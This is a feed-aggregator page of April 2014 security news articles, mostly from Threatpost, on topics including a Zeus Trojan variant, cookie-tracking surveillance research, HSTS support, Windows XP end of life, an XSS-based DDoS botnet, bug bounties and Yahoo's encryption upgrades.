Feed aggregator

New Zeus Variant Comes Complete With a Signed Certificate

Threatpost for B2B - Mon, 04/07/2014 - 14:51

Yet another variant of the Zeus banking Trojan has surfaced; this one comes disguised as an Internet Explorer document and uses an authentic digital certificate to download a rootkit onto infected machines.

According to researchers at the SSL firm Comodo, more than 200 examples of the Trojan have been discovered in the wild so far.

Launched via a simple Man-in-the-Browser (MitB) attack, the Trojan relies on a user either downloading a suspicious attachment in an email or being hit with the exploit. From there the fake IE document goes ahead and does some fairly routine Zeus things like stealing user data entered into web forms, login credentials, and credit card information, in order to perpetuate financial fraud.

What’s interesting is that Comodo claims the bogus IE file is signed with a seemingly legitimate certificate from the Swiss software development firm Isonet AG, something that’s allowed the malware to proceed undetected by antivirus systems.

Once it runs the file copies itself to memory, is executed and rootkit components from two locations are downloaded. The rootkit is decrypted into a driver and installed in the Boot Bus Extender group, making certain it can run before other drivers, something that helps keeps the Trojan even more covert.

“Its purpose is to protect malicious files and auto-run entries from being deleted by user or antivirus software, increasing difficulty of the removal process,” Comodo wrote in a description of the malware last Thursday.

Using fake and stolen SSL certificates has become commonplace among criminals looking to con users and put their machines at risk, it was just a few months ago that a slew of fake certificates were caught masquerading as legitimate ones from services like Facebook, YouTube and iTunes.

In the wake of big name CA hacks like GlobalSign and DigiNotar over the last few years,  Google updated all of its SSL certificates to 2048-bit RSA up from 1024 last fall and is in the midst of limiting certificate validity to 60 months, along with Mozilla, in hopes of preventing further subordinate certificate abuse.

When it comes to certificate abuse, Comodo found itself in the news back in 2011 when it accidentally granted a certificate to an Iranian hacker who went on to issue himself a handful of valid certificates for Google, Yahoo, Skype, Mozilla, and others domains. Comodo was quick to revoke the fraudulent certificates and deploy additional audits and controls to combat future incidents.

Crypto Model Based on Human Cardiorespiratory Coupling

Threatpost for B2B - Mon, 04/07/2014 - 14:21

P { margin-bottom: 0.08in; }A:link { }
-->A novel and theoretical encryption scheme inspired by new insights into the way that the human heart and lungs communicate is said to be substantially different than existing crypto-methods and highly resistant to conventional attacks.

The research was undertaken and published by Professors Tomislav Stankovski, Peter McClintock, and Aneta Stefanovska from the Department of Physics at the United Kingdom’s Lancaster University.

“Here we offer a novel encryption scheme derived from biology, radically different from any earlier procedure,” said Stankovski. “Inspired by the time-varying nature of the cardio-respiratory coupling functions recently discovered in humans, we propose a new encryption scheme that is highly resistant to conventional methods of attack.”

Under this new cryptographic scheme, the sender’s communications would be encrypted as time variations of coupling functions from a pair of dynamical systems. These encrypted communications would then travel to and be decrypted by a second pair of identical dynamical systems using the same coupling functions. This, the researchers explain, is analogous to the way in which the human heart and lungs work to communicate with one another.

According to an introduction to the concept posted by the Computer Science Department at Brown University, “Dynamical systems are mathematical objects used to model physical phenomena whose state (or instantaneous description) changes over time. These models are used in financial and economic forecasting, environmental modeling, medical diagnosis, industrial equipment diagnosis, and a host of other applications.”

For a bit of context, the researchers explain that a recent discovery in the field of biology demonstrated that cardiorespiratory coupling functions can be broken down into a number of independent functions and that those functions are of a time-varying nature. In other, simpler words: these coupling functions can essentially be deconstructed and used as ciphers.

“As so often happens with important breakthroughs,” said Professor Stefanovska, “this discovery was made right on the boundary between two different subjects – because we were applying physics to biology.”

These findings, they explain, result in complicated biomedical functions that can be applied to the production of efficient and modular secure communications.

“The use of coupling functions in this way confers an unbounded number of encryption possibilities,” the researchers wrote in a popular summary of their work. “We demonstrate that the scheme enables more than one signal to be transmitted/received simultaneously and that it is exceptionally robust against external noise.”

Using coupling functions instead of standard cryptographic methods increases security by offering a greater degree of freedom in the encryption process without changing the qualitative state of the system. Thus, the researchers believe their method is a significant conceptual advance to the field of cryptography.

Furthermore, the scheme, the researcher claim, is highly modular, which enables it to be implemented in a wide array of different applications and communications protocols.

“This promises an encryption scheme that is so nearly unbreakable that it will be equally unwelcome to internet criminals and official eavesdroppers,” McClintock claims.

The advantage here, the researchers write, is that the new method offers an infinite number of choices for the secret encryption key shared between the sender and the receiver. This makes it virtually impossible for hackers and eavesdroppers to crack the code.

“Unlike all earlier encryption procedures, this cipher makes use of the coupling functions between interacting dynamical systems,” the researchers wrote. “It results in an unbounded number of encryption key possibilities, allows the transmission or reception of more than one signal simultaneously, and is robust against external noise. Thus, the information signals are encrypted as the time variations of linearly independent coupling functions.”

You can read a PDF version of their short but dense paper here and view a diagram illustrating how their method works below:

Crypto Model Based on Human Cardiorespiratory Coupling

Connecting the Dots Between Cookies and Identities

Threatpost for B2B - Mon, 04/07/2014 - 13:23

A team of computer science engineers from Princeton have released a paper that explains how an adversary with a passive presence on a network or Internet backbone could track individuals by observing HTTP cookies.

The motivation for the project was news in December that the National Security Agency had the capability to access Google’s PREF cookies to conduct surveillance on individual targets. PREF cookies are preferences cookies that websites reference to learn a user’s preferred language for localization purposes and other personalization features.

Since much isn’t known in detail about how the NSA gathers PREF cookies, the Princeton team decided to take more of a high-level approach with their experiment in order to connect the dots between the cookies that are dropped on a user’s machine as they surf the Web in order to establish their real-world identity.

Assuming an adversary, whether a criminal or intelligence agency, has a presence on the network, the working premise here is that the first- and third-party cookies dropped by sites and advertisers can be used to tie a user to web traffic without having to worry about dynamic IP addresses,” said the paper, “Cookies that give you away: Evaluating the surveillance implications of web tacking,” written by Dillon Reisman, Steven Englehardt, Christian Eubank, Peter Zimmerman, and Arvind Narayanan. Also, HTTPS doesn’t seem to be an issue in this case because, the paper said, many websites where users are logged in may already reveal their identity in plain text.

“Thus, an adversary that can wiretap the network can not only cluster together the web pages visited by a user, but can then attach real-world identities to those clusters. This technique relies on nothing other than the network traffic itself for identifying targets,” the paper said. “Even if a user’s identity isn’t leaked in plaintext, if the adversary in question has subpoena power they could compel the disclosure of an identity corresponding to a cookie, or vice versa.”

The paper illustrates the researchers’ theory. The attacker passively monitors a user’s web traffic. Each time a user lands on a webpage, cookies are dropped, but the adversary is unable to begin connecting those dots until there are more than two sites visited.

“The unique cookie from X connects A and C while the one from Y connects B and C. We assume here that the user has visited pages with both trackers before so that cookies have already been set in her browser and will be sent with each request.”

The experiment modeled user behavior online, a supposition that a user visits up to 300 websites during a two-three month period, and looks for components that will connect users to their identity. The paper said that 90 percent of visits are able to be clustered in this way.

“It applies even if the adversary is able to observe only a small, random subset of the user’s requests,” the paper said. “We find that on average, over two-thirds of time, a web page visited by a user has third-party trackers.”

The researchers also learned that 60 percent of the top 50 Alexa websites transmit identifying information in plaintext, such as a user’s name or email address, once a user is logged in, greatly enhancing the experiment’s chances of success.

An attacker interested in monitoring the web activities of a target or set of targets can scan for identity information in the plaintext HTTP traffic or target the cookie ID from a first-party page, the paper said. The researchers said this starting point enables the attacker to “transitively” connect the first-party cookie to other first- and third-party cookies to tie an identity to a cluster of traffic.

“We hope that these findings will inform the policy debate on both surveillance and the web tracking ecosystem,” the paper said. “We also hope that it will raise awareness of privacy breaches via subtle inference techniques.”

Chrome Adds Ability to Force Ephemeral Mode

Threatpost for B2B - Mon, 04/07/2014 - 10:16

Google has made a subtle change to the admin console in its Chrome browser, which is used in enterprise environments to help set policies for employee use, which will allow administrators to force users to browse in ephemeral mode.

The change won’t have any effect on typical individual users who run Chrome in an unmanaged environment, such as a home machine or enterprise that doesn’t use the admin console. But for administrators in environments where they’re managing a lot of users running Chrome, the ability to force ephemeral mode is a helpful tool in the fight against data loss and other security problems.

Ephemeral mode is a function that allows users to browse the Web on a shared device or a personal laptop by using a profile that won’t save any data or history after the browser is closed. The profile is saved to the machine’s disk and the user has the ability to sign in to Chrome Sync, but once the user closes the browser at the end of the session, the profile is destroyed.

“If Google Chrome Sync is enabled, any changes that the user makes to the browser’s settings or to their Chrome data (such as bookmarks, history, apps etc.) during an ephemeral session will be saved for future sessions. The settings are saved in the user’s Google account in the cloud. If Google Chrome Sync is not enabled, any changes are lost when the user exits the browser,” Google’s documentation on the feature says.

Ephemeral mode is somewhat similar to incognito mode, a feature of the Chrome browser that enables users to browse without any personal settings or without Chrome saving cookies, history or any other identifying information. But there are a few key differences between ephemeral and incognito modes. Most importantly, a user has the ability to choose when or if to use incognito mode.

With ephemeral mode, administrators set that as a policy on a global basis. Also, in ephemeral mode, users have access to their Chrome settings and bookmarks through Chrome Sync. Incognito mode does not allow users to access personal settings.

Despite the advantages that ephemeral mode provides, it does still count on the user for some of it.

“When ephemeral mode is set at the user level in the Google Admin console, it relies on the user to sign in to Chrome for sync benefits and for the policy to take effect. The policy should only be used on devices that the user trusts and that are compliant with other corporate policies.” Google says.


IE 12 to Support HSTS Encryption Protocol

Threatpost for B2B - Fri, 04/04/2014 - 15:41

Microsoft confirmed today it will support HTTPS Strict Transport Protocol (HSTS) in Internet Explorer 12, bringing its browser in line with other major vendors in its support of the protocol.

Browsers supporting HSTS force any sessions sent over HTTP to be sent instead over HTTPS, encrypting communication to and from a website.

According to OWASP, HSTS protects users from a number of threats, in particular man-in-the-middle attacks by not only forcing encrypted sessions, but also stopping attackers who use invalid digital certificates. The protocol denies users the ability to override invalid certificate messages. HSTS also protects users from HTTPS websites that also may include HTTP links or serve content unencrypted.

IE 12 is expected to be released this year; IE 11 was introduced in October 2013 and is the default browser in Windows 8.1.

IE 12’s support of HSTS puts it on an even keel with other browsers, some such as Chrome and Firefox have supported the protocol since 2011. Apple added HSTS support on Safari upon the release of Mavericks 10.9.

According to the Electronic Frontier Foundation’s Encrypt the Web report, a few leading technology companies already support HSTS on their websites, including Dropbox, Foursquare, SpiderOak and Twitter. Others such as Facebook, LinkedIn, Tumblr, and Yahoo also plan to do so this year; Google too for select domains.

EFF staff technologist Jeremy Gillula said today that developers either are unaware of the availability of HSTS, or have been stymied by incomplete support in browsers.

“This is changing though: we noticed that Apple quietly added HSTS support to Safari in OS X 10.9,” Gillula said. “For now, Internet Explorer doesn’t support HSTS—which means that there’s basically no such thing as a secure website in IE.”

Until that happens, much of the security burden falls on the user to either rely on a browser that supports HSTS, or use something such as the HTTPS Everywhere browser extension.

“For now all a savvy user can do is to always carefully examine the address of the site you’ve loaded, and verify that it’s secure by checking to make sure it has “https” in the front and is the precise address you want to visit,” Gillula said. “Unfortunately this assumes that you know ahead of time (and remember) whether or not a site should be secure, and are meticulous with every website you visit.”

Secure protocols such as HTTPS, HSTS and Perfect Forward Secrecy have been given greater priority now that the depths of NSA and government surveillance have been exposed. Experts urge developers to consider encryption technologies such as these a minimum standard for web-based services such as email.

Just this week, Yahoo caught up to many of its contemporaries when it announced that it had encrypted traffic moving between its data centers; Snowden documents revealed that the NSA and Britain’s GCHQ were able to tap into overseas fiber optic cables and copy data as it moved to the company’s data centers. Yahoo also announced its intention to support HSTS, Perfect Forward Secrecy and Certificate Transparency this year.

Microsoft to Block Unwanted Adware July 1

Threatpost for B2B - Fri, 04/04/2014 - 14:11

Microsoft has announced this summer it will change the way it classifies adware by beginning to block unwanted and intrusive advertisements from users.

New objective criteria drafted up by the company stipulates that by July 1 internet ads must have a visible close button and must clearly state who’s behind them, or they’ll be branded as adware.

A blog post by Michael Johnson, a researcher at the company’s Malware Protection Center, described the changes in a blog entry Thursday afternoon.

According to Johnson advertisements must adhere to the following rules, or they “will be detected as adware and immediately removed from the user’s machine:”

Advertisements must:

  • Include an obvious way to close the ad.
  • Include the name of the program that created the ad.

Currently when Microsoft’s security products detect a program is operating suspiciously, the program is allowed to run, and the user is alerted and then given a recommended option to proceed. On July 1 when adware is found, Microsoft will stop the program entirely, notify the user and give them the option to restore it if they want.

Going forward users will also be given the option to uninstall whatever program is making the ads – providing of course the program has an uninstall entry in the Windows control panel.

The efforts are being implemented partly to better provide users with choice and control but also to give developers a three-month time period to ensure their programs comply with Microsoft’s new rules.

The approach reflects the company’s latest objective criteria update that defines how its antimalware products, products such as Security Essentials, Windows Defender, Safety Scanner, etc., will identify potentially unwanted software.

“We believe that it will make it easy for software developers to utilize advertising while at the same time empowering users to control their experience,” Johnson wrote of the new criteria yesterday.

Windows XP End-Of-Life Breeding Equal Parts FUD, Legit Concerns

Threatpost for B2B - Fri, 04/04/2014 - 12:13

For those of you anticipating the start of a Walking Dead-style malware apocalypse next Tuesday, calm yourselves.

The official end of security support for Windows XP is upon us, but it’s important to check some anxiety at the door and keep some perspective.

“I’ve been a forensics investigator 14 years and in my experience, I don’t know I’ve come across one incident, or very few anyway, where a vulnerability was exploited where an unpatched system wasn’t the source of a breach,” said Christopher Pogue, director at Trustwave. Pogue said breaches are much more likely to be blamed on poor passwords, weak access control systems or a poorly configured firewall and a glaring hole in the underlying operating system.

“All the administration stuff in place around these systems falls down. Attackers leverage that because they want the path of least resistance,” Pogue said. “You have to presume that before they get their exploit on an unpatched XP machine, they have to breach the environment, bypass firewalls get to the system, pivot to the unpatched system and hope it has critical data on it so they can run exploit code. There are a whole lot of items that have to line up for that to happen.”

The hype and hyperbole around April 8, the latest in a long line of security Doomsdays, is rooted in theories that because a good number of XP systems remain in use storing data and processing transactions, that any previously unreported XP vulnerabilities will be perpetual zero-days. The theory continues that attackers have been building and hording XP exploits, anxiously wringing their hands waiting for April 8, 2014 to come and go.

Now to dismiss all of that as FUD is foolhardy; some attackers who do have XP exploits that will be zero days in a matter of five days are going to wait. Others are less patient (see the recent XP Rich Text Format zero day that will be patched on Tuesday). And for those smaller organizations with fewer IT resources that may still be running XP machines that still hum along carrying out their mission day after day, their risk posture will be slouching a little more come Tuesday.

Big picture, however, people are moving off of XP. Qualys CTO Wolfgang Kandek published some numbers based off the company’s flagship vulnerability scanning service that indicate the XP installed base had dipped to below 15 percent, down from 35 percent 14 months ago. Migrations in the transportation and health care industries are much more dramatic, he said.

“These are two extremes, but all industries are showing a downward slope (migrating off XP); none are stagnant,” Kandek said.

Kandek is in the camp that attackers will intensify their targeting of XP machines and in particular will look at patches for modern Windows 7 and 8 systems and determine whether those vulnerabilities could be present in no-longer supported XP machines. He also urges organizations that must use XP to isolate those machines off the network, keep them for a specialized purpose and keep them offline.

“In May, Microsoft will publish bulletins and patches, and those can be taken by a hacker and reverse-engineered. They will ask ‘What does fix?’ And once they know what it does on Windows 7 or 8, that it changes a DLL or fixes an overflow, they could go into XP and figure out whether the same DLL exist or overflow vulnerability exists,” Kandek said. “Patches map to vulnerabilities that could be in XP. Sometimes they’re only in a new component of Windows 7, but most of the time you can find those vulnerabilities in XP.”

Kandek said that roughly 70 percent of vulnerabilities that were patched in 2013 were found in Windows 8 through XP.

“I don’t see why that would stop in May, June or July. Attackers can use that knowledge as pointer into XP to find if a vulnerability exists. It’s an accelerator for them. My feeling is that after two or three months, there will be tools in public that reliably exploit XP. I can definitely see how that would make an attacker’s work much easier.”

A key difference to point out, however, is that Windows 7 and 8, for example, are radically different under the hood than XP. Microsoft has invested time and money into building mitigations for a number of dangerous memory-based attacks. Technologies such as ASLR and DEP make it much more challenging and costly for an attacker to execute malicious code against vulnerabilities in the operating system. Looking for bugs in XP that live in Windows 7 or 8 just may not be the best use of resources for an attacker.

“An attacker has always chose the path of least resistance to gain access to a system; they don’t have to exploit the operating system, and for the most part, haven’t,” Trustwave’s Pogue said. “While it’s still possible, if I were a small business owner and running XP to store and process data, I’d be concerned about it and take steps run and updated and patched operating system. Even so, it’s important to remember that’s not a silver bullet. Updating to Windows 7 doesn’t mean you’re necessarily safe. You have to build up defense-in-depth mechanisms. XP has been updated and patched up to now, and I’ve investigated thousands of breaches on XP systems. An updated OS does not always equal security.”

Researchers Uncover Interesting Browser-Based Botnet

Threatpost for B2B - Fri, 04/04/2014 - 10:42

Security researchers discovered an odd DDoS attack against several sites recently that relied on a persistent cross-site scripting vulnerability in a major video Web site and hijacked users’ browsers in order to flood the site with traffic.

The attack on the unnamed site involved the use of injected Javascript on the site which would execute in a user’s browser whenever he views a profile image that contains the Javascript. Once the code runs, it then fires off an embedded iframe with a DDoS tool that sends a GET request to the target sites. The attacker embedded the malicious code in his own profile image on the video site, and then posted a comment on hundreds of videos so that his profile image appears next to the comment.

As more and more visitors watched the videos, and therefore viewed the malicious image, the GET requests continues to mount for the targeted sites.

“As a result, each time a legitimate visitor landed on that page, his browser automatically executed the injected JavaScript, which in turn injected a hidden <iframe> with the address of the DDoSer’s C&C domain. There, an Ajax-scripted DDoS tool hijacked the browser, forcing it to issue a DDoS request at a rate of one request per second,” Ronen Atia of Incapsula, the security company that discovered the attack, wrote in an analysis.

“Obviously one request per second is not a lot. However, when dealing with video content of 10, 20 and 30 minutes in length, and with thousands of views every minute, the attack can quickly become very large and extremely dangerous. Knowing this, the offender strategically posted comments on popular videos, effectively created a self-sustaining botnet comprising tens of thousands of hijacked browsers, operated by unsuspecting human visitors who were only there to watch a few funny cat videos.”

The company was able to intercept the malicious requests going to the target sites and traced it back to the compromised video site, which Incapsula is not naming yet. The researchers then inserted a piece of their own Javascript into the requests, replacing the target URL. They then were able to figure out the persistent XSS vulnerability and alerted the owners of the compromised site.

Despite that success, Atia said that the attacker behind the DDoS has replaced the original tool he was using with a more sophisticated version.

“This leads us to believe that what we saw yesterday was a sort of POC test run. The current code is not only much more sophisticated, but it is also built for keeping track of the attack, for what seems like billing purposes. From the looks of it, someone is now using this Alexa Top 50 website to set up a chain of botnets for hire,” he said.

That attack Incapsula uncovered shares some characteristics with some research that Jeremiah Grossman and Matt Johansen of WhiteHat Security presented at Black Hat last year. In their example, an attacker could inject malicious Javascript into ads that are distributed via an ad network and force the user’s browsers to perform an operation, whether it’s launching a DDoS attack on a target server or something else.

Blog: Stealing from wallets

Secure List feed for B2B - Fri, 04/04/2014 - 07:06
We’ve written several times about mobile malware that can send text messages to premium numbers or steal money from online bank accounts. We also know that cybercriminals are constantly looking for new ways of stealing money using mobile Trojans.

Facebook Bug Bounty Submissions Dramatically Increase

Threatpost for B2B - Thu, 04/03/2014 - 15:00

Facebook today reported a dramatic increase in 2013 submissions to its bug bounty program, and said that despite reports from researchers that it’s becoming difficult to find severe bugs on its various properties, the social network plans to increase rewards for critical bugs.

“The volume of high-severity issues is down, and we’re hearing from researchers that it’s tougher to find good bugs,” Facebook security engineer Collin Greene said. “To encourage the best research in the most valuable areas, we’re going to continue increasing our reward amounts for high priority issues.”

Greene said Facebook paid out $1.5 million in bounties last year, rewarding more than 330 researchers at an average payout of $2,204. Submissions, however, skyrocketed 246 percent over 2012 to 14,763, he said. Most of those, however, were not eligible for a bounty; only six percent were rated high severity. Greene said that Facebook has been able to cut its response time for critical vulnerabilities down to six hours. Facebook also released geographic stats on its bug submissions, revealing that researchers in India contributed the largest number of valid bugs (136), while researchers in Russia earned on average more than anyone from the program, $3,961 (38 bugs). U.S.-based researchers, meanwhile, reported 92 bugs and were rewarded on average $2,272.

“Most submissions end up not being valid issues, but we assume they are until we’ve fully evaluated the report,” Greene said. “That attitude makes it possible for us to triage high-priority issues quickly and get the right resources allocated immediately.”

Most leading technology providers have some sort of vulnerability rewards program. Most, including Google, Yahoo, Github and others reward researchers for finding vulnerabilities in Web-based applications and services. Microsoft, however, is an outlier, paying significant rewards for bypasses of mitigations built into Windows and other Microsoft products.

These companies are in a constant tug of war with vulnerability brokers, exploit vendors and the black market, most of whom pay more for bugs than vendors. Microsoft, for example, has tried to narrow the gap with a $100,000 rewards for mitigation bypasses, but even a low six-figure payout may pale in comparison to what a less than scrupulous researcher could earn on the underground, for example.

Other legitimate programs such as HP’s Zero-Day Initiative offer six-figure paydays at events such as the Pwn2Own contest held in conjunction with the annual CanSecWest conference. This year’s contest paid out $850,000 with French exploit vendor VUPEN cashing in with close to a half-million dollars in prizes.

Facebook’s biggest payout was made in January to Brazilian engineer Reginaldo Silva who earned $33,500 for what Facebook called an XML External Entities Attack. The vulnerability could allow an attacker to read files from a Facebook server to another internal service and execute code. The bug caused Facebook to disable external entities across and audit the code for similar endpoints, Greene said.

“One of the most encouraging trends we’ve observed is that repeat submitters usually improve over time,” Greene said. “It’s not uncommon for a researcher who has submitted non-security or low-severity issues to later find valuable bugs that lead to higher rewards.”

To that end, Green said Facebook is giving researchers a new support dashboard where they can view the status of submissions. Also, the bug bounty has  now been extended to Facebook acquisitions Instagram, parse, Atlas and Onavo.

Microsoft to Fix Word Zero Day with Final XP Patch

Threatpost for B2B - Thu, 04/03/2014 - 14:51

P { margin-bottom: 0.08in; }A:link { }
-->In just five days, Microsoft will send off two critical and two important rated security bulletins in what will be the very last Patch Tuesday release providing support for the Redmond, Washington computer company’s ancient and always-vulnerable XP operating system.

The critically rated bulletins will address remote code execution vulnerabilities in Microsoft Office, Office Services, and Office Web Apps as well as bugs in Windows and Internet explorer. The important rated bulletins will close off holes in Windows and Office.

Of course, the first bulletin will resolve a Microsoft Word zero day. The company issued a special security advisory and produced a Fix-it solution after it spotted targeted attacks exploiting the zero day in the wild late last month. The patch warrants highest priority despite the fact that observed attacks required hackers to perform a complicated chain of exploits.

“This is a critical vulnerability that could allow remote code execution if a user opens a RTF file in Word 2010 or in Outlook while using Word as the email viewer,” explained Russ Ernst, director product management at Lumension, in an email interview. “Known to be under active attack, a hacker using this vulnerability could gain user rights.”

The second bulletin, Ernst explained, is a cumulative update for Internet Explorer, which is also critically rated and of high priority for the many IE users on the Web.

“If pushing patches for these new vulnerabilities while working a migration plan for XP and Office 2003 users weren’t enough,” Ernst continued, “administrators are still dealing with the fallout from the recent Pwn2Own competition, which revealed vulnerabilities in all of the major browsers and in Adobe’s Flash Player plug-in.”

To drive home that point, IT will indeed have their hands full with this and Pwn2Own fixes from Mozilla and Chrome and a recent patch for Safari from Apple as well.

Wolfgang Kandek from Qualys noted in an Interview with Threatpost that this light month of patches is in-step with what has been a light overall year for patches. Thus far, Microsoft has issued just 20 bulletins compared to 36 last year and 28 in 2012.

“That number is lower than where we’re at normally, and I don’t know why,” Kandek admited. “I think people are submitting fewer vulnerabilities to Microsoft; that’s the only explanation I can come up with at the moment. There’s no reason we’re seeing fewer vulnerabilities and I don’t think there’s less research going on. There is no shortage of people who look for bugs, maybe there is a shortage of people who do it for free.”

Kandek’s observation regarding less bug submission is simultaneously sensible and puzzling. On the one hand, Microsoft has been consistently sweetening the pot for security researchers that disclose bugs for the last year or so. On the other hand, exploit brokers like Vupen and other hacking teams are cashing in at hacking contest like Pwn2Own – where the payouts are bigger than ever – rather than submitting directly to Microsoft.

Regulators To US Banks: Be Vigilant of ATM Fraud, DDoS

Threatpost for B2B - Thu, 04/03/2014 - 14:46

U.S. regulators are warning banks this week about a recent rash of “large dollar value” ATM fraud and the ongoing risks distributed denial of service (DDoS) attacks that target public bank websites can pose.

Members of FFIEC, the Federal Financial Institutions Examination Council, an interagency sect of the U.S. government responsible for preparing banking standards and principles, issued the warnings in a statement yesterday.

FFIEC claims attackers have been able to gain access to and alter the settings on web-based ATM control panels belonging to small to medium sized institutions.  The campaign, nicknamed “Unlimited Operations” by the U.S. Secret Service, is allowing attackers to withdraw money beyond controlled limits on ATMs, oftentimes more than the victim’s cash balance.

FFIEC’s warning describes how exactly the control panels figure into the ATMs:

“These control panels, often web-based, manage the amount of money customers may withdraw within a set time frame, the geographic limitations of withdrawals, the types and frequency of fraud reports that its service provider sends to the financial institutions, the designated employee that receives these reports, and other management functions related to card security and internal controls,”

Officials are claiming hackers used phishing attacks to secure legitimate employee log-ins to tweak these settings to carry out their attacks, including one that netted them $40 million with 12 debit card accounts.

FFIEC also used the announcement as an opportunity to remind banks about the continued sophistication surrounding DDoS attacks – pointing out a string of attacks that affected institutions in 2012 and warning that they can be used as a “diversionary tactic,” granting hackers the time to root around systems.

Naturally, FFIEC is encouraging banks to mitigate further risk by following standards already in place such as PCI-DSS and HSM when it comes to encrypting PINs.

The agency is also encouraging banks if they haven’t already, to formulate some sort of DDoS readiness plan with a program that prioritizes and assesses risks in its critical systems.

“The members expect financial institutions to take steps to address this threat by reviewing the adequacy of their controls over their information technology networks,” the joint statement reads.

We first learned about “Unlimited Operations” last spring after eight members of the cybercrime ring were indicted in Brooklyn. Associates in at least 26 countries helped the crew cash out fake credit cards at 140 different ATMs to the tune of $45 million – $2.8 in NYC – in just shy of 24 hours.

According to a federal indictment unsealed last year the money was later spent on kickbacks such as luxury cars and Rolex watches.

Cyberespionage, Not Cyber Terror, is the Major Threat, Former NSA Director Says

Threatpost for B2B - Thu, 04/03/2014 - 10:40

CHANTILLY, VA–The list of threats on the Internet is long and getting longer each day. Cybercrime, nation-state attackers, cyber espionage and hacktivists all threaten the security and stability of the network and its users in one way or another. But the one threat that some experts have warned about for years and has never emerged is cyber terrorism, a former top U.S. intelligence official said.

In the years after 9/11, as the Internet became an integral part of daily life in much of the world, some in the national security community warned that the network also would become a key conduit for terrorist attacks against a variety of targets. Utilities, critical infrastructure, banks and other vital pieces of the global economy would be choice targets for groups seeking to wreak havoc via electronic attacks. However, those attacks have not materialized.

“I don’t have a single example of cyber terrorism. Not one incident,” Michael Hayden, the former director of the CIA and NSA, said during a keynote speech at the Systems Engineering DC conference here Thursday.

“They use the Web to recruit and to proselytize, but they don’t use the Web to attack.”

Cyber terrorism, much like its close relation cyberwar, have become loaded terms in the security and intelligence communities. There are any number of definitions floating around for each of them, and none seems to have become authoritative. But attacks such as Stuxnet and Flame have been touted in some circles as examples of cyberwar, while others dispute this notion. And there’s often quite a bit of overlap between cyber terrorism, typical cybercrime and other attacks in discussions about the topic.

But the use of the Internet by traditional terrorist groups for attacks against physical assets–or to disrupt the Internet itself–is not something that’s going on right now, Hayden said.

“They’re into mass destruction and not mass disruption. Maybe they don’t want to disrupt the platform they’re using,” he said. “If they ever downshift to mass disruption, it could be very troubling.”

Hayden, who now works for the Chertoff Group, said that the threat landscape today is growing more complex every day, and that cybercrime, hacktivism, nation-state attackers and other elements all play a part in this. Of the malicious activities that pervade the Internet today, Hayden said that perhaps the largest threat is cyber espionage. Governments using electronic means to conduct corporate espionage or even traditional espionage remotely has become a sensitive topic in diplomatic circles, especially in light of the Snowden revelations about the NSA’s activities.

“The overwhelming majority is people going where they’re not invited and taking stuff they’re not entitled to,” Hayden said.

He emphasized that the U.S. intelligence community is very good at its job, which to a large degree involves taking other people’s stuff, but said the CIA and NSA don’t do so on behalf of American corporate interests. That, he said, is an important distinction.

“I know a fair bit about stealing stuff in the cyber domain. We’re really good at it, and we do it to keep you safe,” he said.

Tool Estimates Incident Response Cost for Businesses

Threatpost for B2B - Thu, 04/03/2014 - 10:31

P { margin-bottom: 0.08in; }
-->A thorough and freely available tool aims to help security professionals and executives anonymously tabulate the costs incurred on enterprises following all manner of cyber-incidents.

Called CyberTab, the tool was created by The Economist Intelligence Unit and sponsored by the consulting firm Booz Allen Hamilton. While the tool is free, it gives users the choice of opting in to allowing their reports to be used as part of a study undertaken by The Economist.

Based on input estimates of incident response and business expenses, as well as those of lost sales and customers, CyberTab calculates the cost of a specific cyber attack and estimates the return on investment for preventative measures.

It has two modes, a planning mode, which estimates the cost of a potential attack to help organizations better understand the risks they face and their security investment choices, and a reporting mode, which examines and reports the cost of a specific attack that has already occurred based on a long list of factors.

Each tool will ask users to identify the type of attack deployed against them. The options include denial of service attacks, malware infections, misuse of systems by employees or partners, intrusions with no data theft, intrusions with personal data theft, and intrusions with intellectual property data theft.

The tools also inquire – again anonymously – about the size of an affected enterprise, the industry and region in which they operate, the duration and time frame of a specific attack, when and by whom was the attack discovered, who carried out the attack, and what sorts of tactics and technologies were deployed by the attackers.

Beyond that, the tools take into account the types of systems and number of servers and endpoints affected by the incident. In the case of DDoS attacks, the tools ask about the peak bandwidth in gigabits per second. The tool further takes into account the company data and types of accounts implicated in the attack. The impact on intellectual property and number of parties affected – employees, consumer and business customers, and partners – as well.

Outside the details of the attack, the tools also seek out specific cost details. How many incident response workers does the company employ? Which and how many technology measures it eh business invested in? Did the organization seek outside help following the incident? Were there legal or customer service and support costs incurred in the incident.

It offers a straightforward user interface and allows users to stop and save their progress at any time.

In the end, the CyberTab tool takes all these and more factors into account and estimates the total potential cost – in ranges – paid by an affected organization and the amount of money that they could save – for each dollar spent – by deploying preventative measures.


Yahoo Encrypts Data Center Links, Boosts Other Services

Threatpost for B2B - Thu, 04/03/2014 - 10:26

Yahoo certainly has taken its share of knocks during the past nine months of surveillance revelations and Snowden leaks for its encryption shortcomings. But the bruises are healing and the company is slowly working its way back into good graces.

After months of being an encryption laggard, Yahoo gained on the field with a number of enhancements announced last night by new chief information security officer Alex Stamos.

Chief among the improvements is that as of Monday, traffic moving between Yahoo data centers is encrypted. This, along with a lack of email encryption, was an area critics were especially harsh on Yahoo after top secret documents revealed the National Security Agency was able to sniff communications between Yahoo and Google data centers.  The Washington Post reported at the time that a combined initiative between the NSA and Britain’s GCHQ called MUSCULAR allowed the intelligence agencies to copy data from the company’s fiber-optic cables outside the U.S. Google, meanwhile, announced in November it had turned encryption on between its data centers.

“In light of reports that governments have directly tapped Internet backbones to obtain secret access to millions of people’s private communications, it’s become clear that routine use of encryption is an important basic measure for privacy and security online,” said Seth Schoen, senior staff technologist at the Electronic Frontier Foundation. “Without it, any network operator (from the smallest Wi-Fi node to the largest Internet backbone companies), or anyone who can coerce or infiltrate one, can easily see the intimate details of what people are saying online.”

As for email, Yahoo was one of the last major web-based email providers to turn on SSL by default, doing so in January after an initial foray in November when users were given the option to turn it on manually. Stamos said yesterday that in the last month, Yahoo turned on encryption of its email service between Yahoo’s servers and other email providers who support the SMTPTLS standard.

Yahoo has also turned on HTTPS encryption on its home page, search queries that run on the home page and most of its properties. Yahoo supports TLS 1.2, Perfect Forward Secrecy and 2048-bit RSA encryption for its home page, mail and digital magazines, Stamos said. He added that users can initiate encrypted sessions for Yahoo News, Sports, Finance and Good Morning America on Yahoo by typing HTTPS in the URL. He also promised an encrypted version of Yahoo Messenger in the coming months.

“Our goal is to encrypt our entire platform for all users at all time, by default,” Stamos said.

Also on the road map, Stamos said, Yahoo plans to implement HSTS, Perfect Forward Secrecy and Certificate Transparency in the near future.

